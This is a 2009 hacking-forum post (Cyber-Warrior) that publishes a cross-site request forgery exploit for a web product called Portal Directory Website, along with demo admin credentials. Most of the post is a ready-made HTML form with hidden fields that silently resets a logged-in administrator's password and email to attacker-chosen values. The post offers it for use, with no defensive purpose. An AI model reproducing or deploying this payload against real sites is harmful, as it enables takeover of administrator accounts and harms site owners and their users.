ROOT
FORUM ROOT
PORTAL ROOT
CYBER NAVIGATION
DÖKÜMANLAR
DÖKÜMAN EKLE
DOWNLOAD/DOSYA ARSIVI
BASINDA CW
CYBER ACADEMY
ORGANIZASYON
NELER YAPTIK?
OPERASYON YÖNETIM SISTEMI
GÖREV ORG. BASVURU
YÖNETICI BASVURU FORMU
MISYON
KURALLAR
KEFALET
KEFIL HAVUZU
MEMBER NAVIGATION
YENI ÜYE BASVURU
PROFIL
MEMBER NETWORK
SIFREMI UNUTTUM
ÖZEL MESAJLARIM
ONAY E-POSTA GÖNDER
Root
>
Exploits / Vulnerabilities
> Portal Directory Website ~ XSRF Vuln.
Portal Directory Website ~ XSRF Vuln. | Cyber-Warrior Information Technology's World
Madde
Author :
Bug Researchers/BARCOD3
Date :
04.11.2009 23:35:30
#
Portal Directory Website ~ XSRF Vuln.
[Full Screen Display]
< ------------------- header data start ------------------- > ############################################################# # Application Name : Portal Directory Website # vulnerable Type : XSRF # Infection : Administrator sifreleri degistirilebilir. # Home : ozkanbozkurt.com # author : BARCOD3 # Demo : http://portal.dt6software.com/pages/Home Demo User; admin Demo password; demo ############################################################# < ------------------- header data end of ------------------- > < -- bug code start -- > <title>BARCOD3 - Aleza Web Portal XSRF Bug for Bug Researchers - code Hunters TIM </title> <form method=post name=formuserfields id=formuserfields action=victim.com/pages/panel/op/users/panelarea/user enctype=multipart/form-data > <input type=hidden name=userfields[password] value=passWORD size=15 maxlength=30 /> <input type=hidden name=userfields[password2] value=passWORD size=15 maxlength=30 /> <input type=hidden name=userfields[realname] value=Admin size=40 maxlength=255 /> <input type=hidden name=userfields[email] value=ozk4n@email.com size=32 maxlength=255 /> <input type=submit name=userfields[confirm] value=update /> <input type=hidden name=edit value=1 /> <input type=hidden name=edit_userfields value=1 /> </table> </form> < -- bug code end of -- >
Cyber-Warrior TIM All Legal and illegal Rights Reserved.\CWDoktoray 2001©